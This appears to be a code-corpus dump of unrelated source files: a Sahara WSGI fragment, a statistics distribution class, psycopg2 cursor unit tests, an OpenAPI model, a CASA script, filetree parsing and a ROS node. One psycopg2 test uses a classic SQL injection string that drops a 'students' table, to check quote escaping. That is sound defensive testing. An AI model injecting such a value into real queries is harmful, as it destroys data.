"""App builder (wsgi).
Entry point for Experimental V2 Sahara REST API server
"""
app = build_app()
api_v2.register_blueprints(app, url_prefix='/v2')
return app
class Router(object):
def __call__(self, environ, response):
return self.app(environ, response)
@classmethod
def factory(cls, global_config, **local_config):
cls.app = build_app()
return cls(**local_config)
class RouterV2(object):
def __call__(self, environ, response):
return self.app(environ, response)
@classmethod
def factory(cls, global_config, **local_config):
cls.app = build_v2_app()
return cls(**local_config)
| 28.802083 | 79 | 0.668354 |
acfa66450de5ae051982d1868ac1bc42b68ae4f9 | 1,730 | py | Python | src/reliapy/distributions/continuous/_halflogistic.py | reliapy/reliapy | 3efd48af5cc3bedbcbc5de64fb43e6c5625e3f6d | [
"BSD-3-Clause"
] | null | null | null | src/reliapy/distributions/continuous/_halflogistic.py | reliapy/reliapy | 3efd48af5cc3bedbcbc5de64fb43e6c5625e3f6d | [
"BSD-3-Clause"
] | null | null | null | src/reliapy/distributions/continuous/_halflogistic.py | reliapy/reliapy | 3efd48af5cc3bedbcbc5de64fb43e6c5625e3f6d | [
"BSD-3-Clause"
] | null | null | null | from reliapy.distributions.continuous import _Continuous
from scipy.stats import halflogistic as prob
class HalfLogistic(_Continuous):
def __init__(self, loc=None, scale=None, random_state=None):
self.loc = loc
self.scale = scale
self.stats = prob.stats(loc=self.loc, scale=self.scale, moments='mv')
self.random_state = random_state
super().__init__()
def pdf(self, X=None):
"""
PDF.
**Input:**
* **X** (`float`)
Argument.
**Output**
PDF of X.
"""
return prob.pdf(X, loc=self.loc, scale=self.scale)
def cdf(self, X=None):
"""
CDF.
**Input:**
* **X** (`float`)
Argument.
**Output**
CDF of X.
"""
return prob.cdf(X, loc=self.loc, scale=self.scale)
def icdf(self, y=None):
"""
Inverse CDF.
**Input:**
* **X** (`float`)
Argument.
**Output**
Inverse CDF of X.
"""
return prob.ppf(y, loc=self.loc, scale=self.scale)
def moment(self, n=1):
"""
Get the non-central moments of order n.
**Input:**
* **n** (`float`)
Order of the moment.
**Output**
non central moment.
"""
return prob.moment(n, loc=self.loc, scale=self.scale)
def rvs(self, n_sim=1):
"""
Get `n_sim` random samples.
**Input:**
* **n_sim** (`float`)
Number of random samples.
**Output**
Samples.
"""
return prob.rvs(loc=self.loc, scale=self.scale, size=n_sim, random_state=self.random_state)
| 21.898734 | 99 | 0.492486 |
acfa6665b5fcb51a710928f108c8dcae0d85b21f | 24,063 | py | Python | virtual/lib/python2.7/site-packages/psycopg2/tests/test_cursor.py | UMULISA12/ProjPost_Ip | 6bd51e4f49cb310a978f0cf0b1214a6209c295a2 | [
"MIT"
] | null | null | null | virtual/lib/python2.7/site-packages/psycopg2/tests/test_cursor.py | UMULISA12/ProjPost_Ip | 6bd51e4f49cb310a978f0cf0b1214a6209c295a2 | [
"MIT"
] | 10 | 2019-12-26T17:31:31.000Z | 2022-03-21T22:17:33.000Z | virtual/lib/python2.7/site-packages/psycopg2/tests/test_cursor.py | UMULISA12/ProjPost_Ip | 6bd51e4f49cb310a978f0cf0b1214a6209c295a2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# test_cursor.py - unit test for cursor attributes
#
# Copyright (C) 2010-2011 Daniele Varrazzo <daniele.varrazzo@gmail.com>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import time
import pickle
import psycopg2
import psycopg2.extensions
from testutils import (unittest, ConnectingTestCase, skip_before_postgres,
skip_if_no_namedtuple, skip_if_no_getrefcount, slow, skip_if_no_superuser,
skip_if_windows)
import psycopg2.extras
class CursorTests(ConnectingTestCase):
def test_close_idempotent(self):
cur = self.conn.cursor()
cur.close()
cur.close()
self.assert_(cur.closed)
def test_empty_query(self):
cur = self.conn.cursor()
self.assertRaises(psycopg2.ProgrammingError, cur.execute, "")
self.assertRaises(psycopg2.ProgrammingError, cur.execute, " ")
self.assertRaises(psycopg2.ProgrammingError, cur.execute, ";")
def test_executemany_propagate_exceptions(self):
conn = self.conn
cur = conn.cursor()
cur.execute("create temp table test_exc (data int);")
def buggygen():
yield 1 // 0
self.assertRaises(ZeroDivisionError,
cur.executemany, "insert into test_exc values (%s)", buggygen())
cur.close()
def test_mogrify_unicode(self):
conn = self.conn
cur = conn.cursor()
# test consistency between execute and mogrify.
# unicode query containing only ascii data
cur.execute(u"SELECT 'foo';")
self.assertEqual('foo', cur.fetchone()[0])
self.assertEqual(b"SELECT 'foo';", cur.mogrify(u"SELECT 'foo';"))
conn.set_client_encoding('UTF8')
snowman = u"\u2603"
def b(s):
if isinstance(s, unicode):
return s.encode('utf8')
else:
return s
# unicode query with non-ascii data
cur.execute(u"SELECT '%s';" % snowman)
self.assertEqual(snowman.encode('utf8'), b(cur.fetchone()[0]))
self.assertQuotedEqual(("SELECT '%s';" % snowman).encode('utf8'),
cur.mogrify(u"SELECT '%s';" % snowman))
# unicode args
cur.execute("SELECT %s;", (snowman,))
self.assertEqual(snowman.encode("utf-8"), b(cur.fetchone()[0]))
self.assertQuotedEqual(("SELECT '%s';" % snowman).encode('utf8'),
cur.mogrify("SELECT %s;", (snowman,)))
# unicode query and args
cur.execute(u"SELECT %s;", (snowman,))
self.assertEqual(snowman.encode("utf-8"), b(cur.fetchone()[0]))
self.assertQuotedEqual(("SELECT '%s';" % snowman).encode('utf8'),
cur.mogrify(u"SELECT %s;", (snowman,)))
def test_mogrify_decimal_explodes(self):
# issue #7: explodes on windows with python 2.5 and psycopg 2.2.2
try:
from decimal import Decimal
except:
return
conn = self.conn
cur = conn.cursor()
self.assertEqual(b'SELECT 10.3;',
cur.mogrify("SELECT %s;", (Decimal("10.3"),)))
@skip_if_no_getrefcount
def test_mogrify_leak_on_multiple_reference(self):
# issue #81: reference leak when a parameter value is referenced
# more than once from a dict.
cur = self.conn.cursor()
foo = (lambda x: x)('foo') * 10
import sys
nref1 = sys.getrefcount(foo)
cur.mogrify("select %(foo)s, %(foo)s, %(foo)s", {'foo': foo})
nref2 = sys.getrefcount(foo)
self.assertEqual(nref1, nref2)
def test_modify_closed(self):
cur = self.conn.cursor()
cur.close()
sql = cur.mogrify("select %s", (10,))
self.assertEqual(sql, b"select 10")
def test_bad_placeholder(self):
cur = self.conn.cursor()
self.assertRaises(psycopg2.ProgrammingError,
cur.mogrify, "select %(foo", {})
self.assertRaises(psycopg2.ProgrammingError,
cur.mogrify, "select %(foo", {'foo': 1})
self.assertRaises(psycopg2.ProgrammingError,
cur.mogrify, "select %(foo, %(bar)", {'foo': 1})
self.assertRaises(psycopg2.ProgrammingError,
cur.mogrify, "select %(foo, %(bar)", {'foo': 1, 'bar': 2})
def test_cast(self):
curs = self.conn.cursor()
self.assertEqual(42, curs.cast(20, '42'))
self.assertAlmostEqual(3.14, curs.cast(700, '3.14'))
try:
from decimal import Decimal
except ImportError:
self.assertAlmostEqual(123.45, curs.cast(1700, '123.45'))
else:
self.assertEqual(Decimal('123.45'), curs.cast(1700, '123.45'))
from datetime import date
self.assertEqual(date(2011, 1, 2), curs.cast(1082, '2011-01-02'))
self.assertEqual("who am i?", curs.cast(705, 'who am i?')) # unknown
def test_cast_specificity(self):
curs = self.conn.cursor()
self.assertEqual("foo", curs.cast(705, 'foo'))
D = psycopg2.extensions.new_type((705,), "DOUBLING", lambda v, c: v * 2)
psycopg2.extensions.register_type(D, self.conn)
self.assertEqual("foofoo", curs.cast(705, 'foo'))
T = psycopg2.extensions.new_type((705,), "TREBLING", lambda v, c: v * 3)
psycopg2.extensions.register_type(T, curs)
self.assertEqual("foofoofoo", curs.cast(705, 'foo'))
curs2 = self.conn.cursor()
self.assertEqual("foofoo", curs2.cast(705, 'foo'))
def test_weakref(self):
from weakref import ref
curs = self.conn.cursor()
w = ref(curs)
del curs
import gc
gc.collect()
self.assert_(w() is None)
def test_null_name(self):
curs = self.conn.cursor(None)
self.assertEqual(curs.name, None)
def test_invalid_name(self):
curs = self.conn.cursor()
curs.execute("create temp table invname (data int);")
for i in (10, 20, 30):
curs.execute("insert into invname values (%s)", (i,))
curs.close()
curs = self.conn.cursor(r'1-2-3 \ "test"')
curs.execute("select data from invname order by data")
self.assertEqual(curs.fetchall(), [(10,), (20,), (30,)])
def _create_withhold_table(self):
curs = self.conn.cursor()
try:
curs.execute("drop table withhold")
except psycopg2.ProgrammingError:
self.conn.rollback()
curs.execute("create table withhold (data int)")
for i in (10, 20, 30):
curs.execute("insert into withhold values (%s)", (i,))
curs.close()
def test_withhold(self):
self.assertRaises(psycopg2.ProgrammingError, self.conn.cursor,
withhold=True)
self._create_withhold_table()
curs = self.conn.cursor("W")
self.assertEqual(curs.withhold, False)
curs.withhold = True
self.assertEqual(curs.withhold, True)
curs.execute("select data from withhold order by data")
self.conn.commit()
self.assertEqual(curs.fetchall(), [(10,), (20,), (30,)])
curs.close()
curs = self.conn.cursor("W", withhold=True)
self.assertEqual(curs.withhold, True)
curs.execute("select data from withhold order by data")
self.conn.commit()
self.assertEqual(curs.fetchall(), [(10,), (20,), (30,)])
curs = self.conn.cursor()
curs.execute("drop table withhold")
self.conn.commit()
def test_withhold_no_begin(self):
self._create_withhold_table()
curs = self.conn.cursor("w", withhold=True)
curs.execute("select data from withhold order by data")
self.assertEqual(curs.fetchone(), (10,))
self.assertEqual(self.conn.status, psycopg2.extensions.STATUS_BEGIN)
self.assertEqual(self.conn.get_transaction_status(),
psycopg2.extensions.TRANSACTION_STATUS_INTRANS)
self.conn.commit()
self.assertEqual(self.conn.status, psycopg2.extensions.STATUS_READY)
self.assertEqual(self.conn.get_transaction_status(),
psycopg2.extensions.TRANSACTION_STATUS_IDLE)
self.assertEqual(curs.fetchone(), (20,))
self.assertEqual(self.conn.status, psycopg2.extensions.STATUS_READY)
self.assertEqual(self.conn.get_transaction_status(),
psycopg2.extensions.TRANSACTION_STATUS_IDLE)
curs.close()
self.assertEqual(self.conn.status, psycopg2.extensions.STATUS_READY)
self.assertEqual(self.conn.get_transaction_status(),
psycopg2.extensions.TRANSACTION_STATUS_IDLE)
def test_withhold_autocommit(self):
self._create_withhold_table()
self.conn.commit()
self.conn.autocommit = True
curs = self.conn.cursor("w", withhold=True)
curs.execute("select data from withhold order by data")
self.assertEqual(curs.fetchone(), (10,))
self.assertEqual(self.conn.status, psycopg2.extensions.STATUS_READY)
self.assertEqual(self.conn.get_transaction_status(),
psycopg2.extensions.TRANSACTION_STATUS_IDLE)
self.conn.commit()
self.assertEqual(self.conn.status, psycopg2.extensions.STATUS_READY)
self.assertEqual(self.conn.get_transaction_status(),
psycopg2.extensions.TRANSACTION_STATUS_IDLE)
curs.close()
self.assertEqual(self.conn.status, psycopg2.extensions.STATUS_READY)
self.assertEqual(self.conn.get_transaction_status(),
psycopg2.extensions.TRANSACTION_STATUS_IDLE)
def test_scrollable(self):
self.assertRaises(psycopg2.ProgrammingError, self.conn.cursor,
scrollable=True)
curs = self.conn.cursor()
curs.execute("create table scrollable (data int)")
curs.executemany("insert into scrollable values (%s)",
[(i,) for i in range(100)])
curs.close()
for t in range(2):
if not t:
curs = self.conn.cursor("S")
self.assertEqual(curs.scrollable, None)
curs.scrollable = True
else:
curs = self.conn.cursor("S", scrollable=True)
self.assertEqual(curs.scrollable, True)
curs.itersize = 10
# complex enough to make postgres cursors declare without
# scroll/no scroll to fail
curs.execute("""
select x.data
from scrollable x
join scrollable y on x.data = y.data
order by y.data""")
for i, (n,) in enumerate(curs):
self.assertEqual(i, n)
curs.scroll(-1)
for i in range(99, -1, -1):
curs.scroll(-1)
self.assertEqual(i, curs.fetchone()[0])
curs.scroll(-1)
curs.close()
def test_not_scrollable(self):
self.assertRaises(psycopg2.ProgrammingError, self.conn.cursor,
scrollable=False)
curs = self.conn.cursor()
curs.execute("create table scrollable (data int)")
curs.executemany("insert into scrollable values (%s)",
[(i,) for i in range(100)])
curs.close()
curs = self.conn.cursor("S") # default scrollability
curs.execute("select * from scrollable")
self.assertEqual(curs.scrollable, None)
curs.scroll(2)
try:
curs.scroll(-1)
except psycopg2.OperationalError:
return self.skipTest("can't evaluate non-scrollable cursor")
curs.close()
curs = self.conn.cursor("S", scrollable=False)
self.assertEqual(curs.scrollable, False)
curs.execute("select * from scrollable")
curs.scroll(2)
self.assertRaises(psycopg2.OperationalError, curs.scroll, -1)
@slow
@skip_before_postgres(8, 2)
def test_iter_named_cursor_efficient(self):
curs = self.conn.cursor('tmp')
# if these records are fetched in the same roundtrip their
# timestamp will not be influenced by the pause in Python world.
curs.execute("""select clock_timestamp() from generate_series(1,2)""")
i = iter(curs)
t1 = (i.next())[0] # the brackets work around a 2to3 bug
time.sleep(0.2)
t2 = (i.next())[0]
self.assert_((t2 - t1).microseconds * 1e-6 < 0.1,
"named cursor records fetched in 2 roundtrips (delta: %s)"
% (t2 - t1))
@skip_before_postgres(8, 0)
def test_iter_named_cursor_default_itersize(self):
curs = self.conn.cursor('tmp')
curs.execute('select generate_series(1,50)')
rv = [(r[0], curs.rownumber) for r in curs]
# everything swallowed in one gulp
self.assertEqual(rv, [(i, i) for i in range(1, 51)])
@skip_before_postgres(8, 0)
def test_iter_named_cursor_itersize(self):
curs = self.conn.cursor('tmp')
curs.itersize = 30
curs.execute('select generate_series(1,50)')
rv = [(r[0], curs.rownumber) for r in curs]
# everything swallowed in two gulps
self.assertEqual(rv, [(i, ((i - 1) % 30) + 1) for i in range(1, 51)])
@skip_before_postgres(8, 0)
def test_iter_named_cursor_rownumber(self):
curs = self.conn.cursor('tmp')
# note: this fails if itersize < dataset: internally we check
# rownumber == rowcount to detect when to read anoter page, so we
# would need an extra attribute to have a monotonic rownumber.
curs.itersize = 20
curs.execute('select generate_series(1,10)')
for i, rec in enumerate(curs):
self.assertEqual(i + 1, curs.rownumber)
@skip_if_no_namedtuple
def test_namedtuple_description(self):
curs = self.conn.cursor()
curs.execute("""select
3.14::decimal(10,2) as pi,
'hello'::text as hi,
'2010-02-18'::date as now;
""")
self.assertEqual(len(curs.description), 3)
for c in curs.description:
self.assertEqual(len(c), 7) # DBAPI happy
for a in ('name', 'type_code', 'display_size', 'internal_size',
'precision', 'scale', 'null_ok'):
self.assert_(hasattr(c, a), a)
c = curs.description[0]
self.assertEqual(c.name, 'pi')
self.assert_(c.type_code in psycopg2.extensions.DECIMAL.values)
self.assert_(c.internal_size > 0)
self.assertEqual(c.precision, 10)
self.assertEqual(c.scale, 2)
c = curs.description[1]
self.assertEqual(c.name, 'hi')
self.assert_(c.type_code in psycopg2.STRING.values)
self.assert_(c.internal_size < 0)
self.assertEqual(c.precision, None)
self.assertEqual(c.scale, None)
c = curs.description[2]
self.assertEqual(c.name, 'now')
self.assert_(c.type_code in psycopg2.extensions.DATE.values)
self.assert_(c.internal_size > 0)
self.assertEqual(c.precision, None)
self.assertEqual(c.scale, None)
def test_pickle_description(self):
curs = self.conn.cursor()
curs.execute('SELECT 1 AS foo')
description = curs.description
pickled = pickle.dumps(description, pickle.HIGHEST_PROTOCOL)
unpickled = pickle.loads(pickled)
self.assertEqual(description, unpickled)
@skip_before_postgres(8, 0)
def test_named_cursor_stealing(self):
# you can use a named cursor to iterate on a refcursor created
# somewhere else
cur1 = self.conn.cursor()
cur1.execute("DECLARE test CURSOR WITHOUT HOLD "
" FOR SELECT generate_series(1,7)")
cur2 = self.conn.cursor('test')
# can call fetch without execute
self.assertEqual((1,), cur2.fetchone())
self.assertEqual([(2,), (3,), (4,)], cur2.fetchmany(3))
self.assertEqual([(5,), (6,), (7,)], cur2.fetchall())
@skip_before_postgres(8, 2)
def test_named_noop_close(self):
cur = self.conn.cursor('test')
cur.close()
@skip_before_postgres(8, 2)
def test_stolen_named_cursor_close(self):
cur1 = self.conn.cursor()
cur1.execute("DECLARE test CURSOR WITHOUT HOLD "
" FOR SELECT generate_series(1,7)")
cur2 = self.conn.cursor('test')
cur2.close()
cur1.execute("DECLARE test CURSOR WITHOUT HOLD "
" FOR SELECT generate_series(1,7)")
cur2 = self.conn.cursor('test')
cur2.close()
@skip_before_postgres(8, 0)
def test_scroll(self):
cur = self.conn.cursor()
cur.execute("select generate_series(0,9)")
cur.scroll(2)
self.assertEqual(cur.fetchone(), (2,))
cur.scroll(2)
self.assertEqual(cur.fetchone(), (5,))
cur.scroll(2, mode='relative')
self.assertEqual(cur.fetchone(), (8,))
cur.scroll(-1)
self.assertEqual(cur.fetchone(), (8,))
cur.scroll(-2)
self.assertEqual(cur.fetchone(), (7,))
cur.scroll(2, mode='absolute')
self.assertEqual(cur.fetchone(), (2,))
# on the boundary
cur.scroll(0, mode='absolute')
self.assertEqual(cur.fetchone(), (0,))
self.assertRaises((IndexError, psycopg2.ProgrammingError),
cur.scroll, -1, mode='absolute')
cur.scroll(0, mode='absolute')
self.assertRaises((IndexError, psycopg2.ProgrammingError),
cur.scroll, -1)
cur.scroll(9, mode='absolute')
self.assertEqual(cur.fetchone(), (9,))
self.assertRaises((IndexError, psycopg2.ProgrammingError),
cur.scroll, 10, mode='absolute')
cur.scroll(9, mode='absolute')
self.assertRaises((IndexError, psycopg2.ProgrammingError),
cur.scroll, 1)
@skip_before_postgres(8, 0)
def test_scroll_named(self):
cur = self.conn.cursor('tmp', scrollable=True)
cur.execute("select generate_series(0,9)")
cur.scroll(2)
self.assertEqual(cur.fetchone(), (2,))
cur.scroll(2)
self.assertEqual(cur.fetchone(), (5,))
cur.scroll(2, mode='relative')
self.assertEqual(cur.fetchone(), (8,))
cur.scroll(9, mode='absolute')
self.assertEqual(cur.fetchone(), (9,))
def test_bad_subclass(self):
# check that we get an error message instead of a segfault
# for badly written subclasses.
# see http://stackoverflow.com/questions/22019341/
class StupidCursor(psycopg2.extensions.cursor):
def __init__(self, *args, **kwargs):
# I am stupid so not calling superclass init
pass
cur = StupidCursor()
self.assertRaises(psycopg2.InterfaceError, cur.execute, 'select 1')
self.assertRaises(psycopg2.InterfaceError, cur.executemany,
'select 1', [])
def test_callproc_badparam(self):
cur = self.conn.cursor()
self.assertRaises(TypeError, cur.callproc, 'lower', 42)
# It would be inappropriate to test callproc's named parameters in the
# DBAPI2.0 test section because they are a psycopg2 extension.
@skip_before_postgres(9, 0)
def test_callproc_dict(self):
# This parameter name tests for injection and quote escaping
paramname = '''
Robert'); drop table "students" --
'''.strip()
escaped_paramname = '"%s"' % paramname.replace('"', '""')
procname = 'pg_temp.randall'
cur = self.conn.cursor()
# Set up the temporary function
cur.execute('''
CREATE FUNCTION %s(%s INT)
RETURNS INT AS
'SELECT $1 * $1'
LANGUAGE SQL
''' % (procname, escaped_paramname))
# Make sure callproc works right
cur.callproc(procname, {paramname: 2})
self.assertEquals(cur.fetchone()[0], 4)
# Make sure callproc fails right
failing_cases = [
({paramname: 2, 'foo': 'bar'}, psycopg2.ProgrammingError),
({paramname: '2'}, psycopg2.ProgrammingError),
({paramname: 'two'}, psycopg2.ProgrammingError),
({u'bj\xc3rn': 2}, psycopg2.ProgrammingError),
({3: 2}, TypeError),
({self: 2}, TypeError),
]
for parameter_sequence, exception in failing_cases:
self.assertRaises(exception, cur.callproc, procname, parameter_sequence)
self.conn.rollback()
@skip_if_no_superuser
@skip_if_windows
@skip_before_postgres(8, 4)
def test_external_close_sync(self):
# If a "victim" connection is closed by a "control" connection
# behind psycopg2's back, psycopg2 always handles it correctly:
# raise OperationalError, set conn.closed to 2. This reproduces
# issue #443, a race between control_conn closing victim_conn and
# psycopg2 noticing.
control_conn = self.conn
connect_func = self.connect
wait_func = lambda conn: None
self._test_external_close(control_conn, connect_func, wait_func)
@skip_if_no_superuser
@skip_if_windows
@skip_before_postgres(8, 4)
def test_external_close_async(self):
# Issue #443 is in the async code too. Since the fix is duplicated,
# so is the test.
control_conn = self.conn
connect_func = lambda: self.connect(async_=True)
wait_func = psycopg2.extras.wait_select
self._test_external_close(control_conn, connect_func, wait_func)
def _test_external_close(self, control_conn, connect_func, wait_func):
# The short sleep before using victim_conn the second time makes it
# much more likely to lose the race and see the bug. Repeating the
# test several times makes it even more likely.
for i in range(10):
victim_conn = connect_func()
wait_func(victim_conn)
with victim_conn.cursor() as cur:
cur.execute('select pg_backend_pid()')
wait_func(victim_conn)
pid1 = cur.fetchall()[0][0]
with control_conn.cursor() as cur:
cur.execute('select pg_terminate_backend(%s)', (pid1,))
time.sleep(0.001)
def f():
with victim_conn.cursor() as cur:
cur.execute('select 1')
wait_func(victim_conn)
self.assertRaises(psycopg2.OperationalError, f)
self.assertEqual(victim_conn.closed, 2)
@skip_before_postgres(8, 2)
def test_rowcount_on_executemany_returning(self):
cur = self.conn.cursor()
cur.execute("create table execmany(id serial primary key, data int)")
cur.executemany(
"insert into execmany (data) values (%s)",
[(i,) for i in range(4)])
self.assertEqual(cur.rowcount, 4)
cur.executemany(
"insert into execmany (data) values (%s) returning data",
[(i,) for i in range(5)])
self.assertEqual(cur.rowcount, 5)
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
| 37.657277 | 84 | 0.611021 |
acfa66d4cff88564de4b3c48809a4b459bf86b29 | 2,151 | py | Python | src/data-model/src/digital/forge/data/models/base_model_.py | jdeyton/forge-keeper | 6e95aed62f77353c365fa4ae8c2c01192a7b2c2e | [
"MIT"
] | null | null | null | src/data-model/src/digital/forge/data/models/base_model_.py | jdeyton/forge-keeper | 6e95aed62f77353c365fa4ae8c2c01192a7b2c2e | [
"MIT"
] | 4 | 2020-08-09T03:28:05.000Z | 2020-08-13T18:48:43.000Z | src/data-model/src/digital/forge/data/models/base_model_.py | jdeyton/forge-keeper | 6e95aed62f77353c365fa4ae8c2c01192a7b2c2e | [
"MIT"
] | null | null | null | # coding: utf-8
"""
This module provides the base class for all models described by the API.
"""
import pprint
import typing
import six
from digital.forge.data import util
T = typing.TypeVar('T')
class Model:
"""
The base class for all models.
This class is automatically generated! **DO NOT TOUCH!**
"""
# openapiTypes: The key is attribute name and the
# value is attribute type.
openapi_types = {}
# attributeMap: The key is attribute name and the
# value is json key in definition.
attribute_map = {}
@classmethod
def from_dict(cls: typing.Type[T], dikt) -> T:
"""Returns the dict as a model"""
return util.deserialize_model(dikt, cls)
def to_dict(self):
"""Returns the model properties as a dict
:rtype: dict
"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model
:rtype: str
"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
return other is not None and \
isinstance(other, Model) and \
self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 26.555556 | 74 | 0.550907 |
acfa6847b11d1a6187257e1c104b3b11de26f093 | 510 | py | Python | 16B/16B-236/imaging/concat_and_split.py | e-koch/VLA_Lband | 8fca7b2de0b88ce5c5011b34bf3936c69338d0b0 | [
"MIT"
] | 1 | 2021-03-08T23:19:12.000Z | 2021-03-08T23:19:12.000Z | 16B/16B-236/imaging/concat_and_split.py | e-koch/VLA_Lband | 8fca7b2de0b88ce5c5011b34bf3936c69338d0b0 | [
"MIT"
] | null | null | null | 16B/16B-236/imaging/concat_and_split.py | e-koch/VLA_Lband | 8fca7b2de0b88ce5c5011b34bf3936c69338d0b0 | [
"MIT"
] | null | null | null |
'''
Combine the tracks, then split out the science fields
'''
import os
from glob import glob
from tasks import concat, split
# Grab all of the MS tracks in the folder (should be 12)
myvis = glob("*.speclines.ms")
assert len(myvis) == 12
default('concat')
concat(vis=myvis, concatvis='16B-236_lines_all.ms')
default('split')
split(vis='16B-236_lines_all.ms', outputvis='16B-236_lines.ms',
field='M33*',
datacolumn='corrected',
keepflags=False)
os.system("rm -r 16B-236_lines_all.ms")
| 19.615385 | 63 | 0.701961 |
acfa68d17b4b3104e6de1f71d4307625bf1001f9 | 4,227 | py | Python | fsl/utils/filetree/parse.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | 6 | 2018-04-18T03:42:50.000Z | 2021-11-20T18:46:37.000Z | fsl/utils/filetree/parse.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | 13 | 2018-10-01T11:45:05.000Z | 2022-03-16T12:28:36.000Z | fsl/utils/filetree/parse.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | 5 | 2017-12-09T09:02:17.000Z | 2021-11-15T16:55:30.000Z | import glob
import os.path as op
from . import filetree
from contextlib import contextmanager
from pathlib import PurePath
from typing import Tuple, List
import re
tree_directories = ['.', op.join(op.split(__file__)[0], 'trees')]
@contextmanager
def extra_tree_dirs(extra_dirs):
"""Temporarily insert ``extra_dirs`` to the beginning of :attr:`tree_directories`.
:arg extra_dirs: Sequence of additional tree file directories to search.
"""
global tree_directories
old_tree_directories = list(tree_directories)
tree_directories = list(extra_dirs) + list(tree_directories)
try:
yield
finally:
tree_directories = old_tree_directories
def search_tree(name: str) -> str:
"""
Searches for the file defining the specific tree
Iteratively searches through the directories in ``tree_directories`` till a file named ${name}.tree is found
:param name: Name of the tree
:return: path to the file defining the tree
"""
for directory in tree_directories:
filename = op.join(directory, name)
if op.exists(filename):
return filename
elif op.exists(filename + '.tree'):
return filename + '.tree'
raise ValueError("No file tree found for %s" % name)
def list_all_trees() -> List[str]:
"""Return a list containing paths to all tree files that can be found in
:data:`tree_directories`
"""
trees = []
for directory in tree_directories:
directory = op.abspath(directory)
trees.extend(glob.glob(op.join(directory, '*.tree')))
return trees
def check_forbidden_characters(text, characters, text_type):
"""
Checks the text for forbidden characters
raises ValueError if one is found
:param text: string with the text
:param characters: sequence of forbidden characters
:param text_type: type of the text to raise in error message
"""
bad = [character for character in characters if character in text]
if len(bad) > 0:
raise ValueError('Invalid character(s) "{}" in {}: {}'.format("".join(bad), text_type, text))
def read_line(line: str) -> Tuple[int, PurePath, str]:
"""
Parses line from the tree file
:param line: input line from a ``*.tree`` file
:return: Tuple with:
- number of spaces in front of the name
- name of the file or the sub_tree
- short name of the file
"""
if line.strip()[:1] == '->':
return read_subtree_line(line)
match = re.match(r'^(\s*)(\S*)\s*\((\S*)\)\s*$', line)
if match is not None:
gr = match.groups()
check_forbidden_characters(gr[1], r'<>"/\|?*', 'file or directory name')
check_forbidden_characters(gr[2], r'(){}/', 'short name')
return len(gr[0]), PurePath(gr[1]), gr[2]
match = re.match(r'^(\s*)(\S*)\s*$', line)
if match is not None:
gr = match.groups()
short_name = gr[1].split('.')[0]
check_forbidden_characters(gr[1], r'<>"/\|?*', 'file or directory name')
return len(gr[0]), PurePath(gr[1]), short_name
raise ValueError('Unrecognized line %s' % line)
def read_subtree_line(line: str, directory: str) -> Tuple[int, "filetree.FileTree", str]:
"""
Parses the line defining a sub_tree
:param line: input line from a ``*.tree`` file
:param directory: containing directory
:return: Tuple with
- number of spaces in front of the name
- sub_tree
- short name of the sub_tree
"""
match = re.match(r'^(\s*)->\s*(\S*)(.*)\((\S*)\)', line)
if match is None:
raise ValueError("Sub-tree line could not be parsed: {}".format(line.strip()))
spaces, type_name, variables_str, short_name = match.groups()
check_forbidden_characters(type_name, r'<>:"/\|?*', 'sub-tree name')
check_forbidden_characters(short_name, r'(){}/', 'sub-tree name')
variables = {}
if len(variables_str.strip()) != 0:
for single_variable in variables_str.split(','):
key, value = single_variable.split('=')
variables[key.strip()] = value.strip()
sub_tree = filetree.FileTree.read(type_name, directory, **variables)
return len(spaces), sub_tree, short_name
| 32.267176 | 112 | 0.640407 |
acfa690dd3cd2773608b2752b8cd8e0198448d32 | 1,394 | py | Python | src/viz/rk_api.py | jihoonerd/Robot-Kinematics | 1dd15a07b201929e05c25bb15a26f0e50959c171 | [
"RSA-MD"
] | 1 | 2021-09-28T00:46:44.000Z | 2021-09-28T00:46:44.000Z | src/viz/rk_api.py | jihoonerd/robot_kinematics | 1dd15a07b201929e05c25bb15a26f0e50959c171 | [
"RSA-MD"
] | 2 | 2021-02-15T13:16:13.000Z | 2021-02-15T15:24:15.000Z | src/viz/rk_api.py | jihoonerd/robot_kinematics | 1dd15a07b201929e05c25bb15a26f0e50959c171 | [
"RSA-MD"
] | null | null | null | #!/usr/bin/python
import copy
import numpy as np
import rospy
from robot_kinematics.msg import IKMarker
from rk.robot_preset.biped_robot import half_sitting_biped_ro
from visualization_msgs.msg import MarkerArray
from rk.utils import LinkNode, rpy2rot
from viz.utils import ulink_to_marker_array
from viz.viz_manager import VizManager
ik_target = dict()
def callback(data):
global ik_target
ik_target[data.link_id] = np.array([[data.target_pos.x, data.target_pos.y, data.target_pos.z]]).T
def rk_api():
rospy.init_node('rk_pub')
ro = copy.deepcopy(half_sitting_biped_ro)
pub = rospy.Publisher('rk_api/joint', MarkerArray, queue_size=10)
sub = rospy.Subscriber('rk_api/ik_target', IKMarker, callback=callback) # use custom message
viz_manager = VizManager()
viz_manager.add_ik_target('7')
